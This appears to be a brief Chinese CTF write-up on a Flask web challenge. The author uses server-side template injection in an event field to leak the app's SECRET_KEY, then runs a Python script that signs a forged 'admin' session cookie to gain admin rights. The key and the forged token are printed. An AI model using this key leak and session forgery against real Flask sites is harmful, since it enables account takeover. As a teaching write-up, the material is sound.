

随便注册个号进来,发现一个记录事件的框


做了这么多,感觉又是 flask的后端,先看看 session有点像,这种两点分布的

{'_fresh': True, '_id': 'b261ddff44b088e87bc0598a56e2e77038ab9d21a8392dcb8f7133d06a94634f8efe8797234fe66f9943f036d84c6cc2b5fc25f81fbd1d43c39b89081996cdc5', 'user_id': '3'}
那下面就是找秘钥了,经过测试在 event_important处可以模板注入



'SECRET_KEY': 'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
有了秘钥,我们就可以伪造下面的 user的签名
from flask import Flask
from flask.sessions import SecureCookieSessionInterface
app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)
@app.route('/')
def index():
print(session_serializer.dumps("admin"))
index()
# ImFkbWluIg.YwnA1g.Plkavr2RY7RnpGF7RCL3SVtiJ3g
替换 user,我们就获得了 admin权限
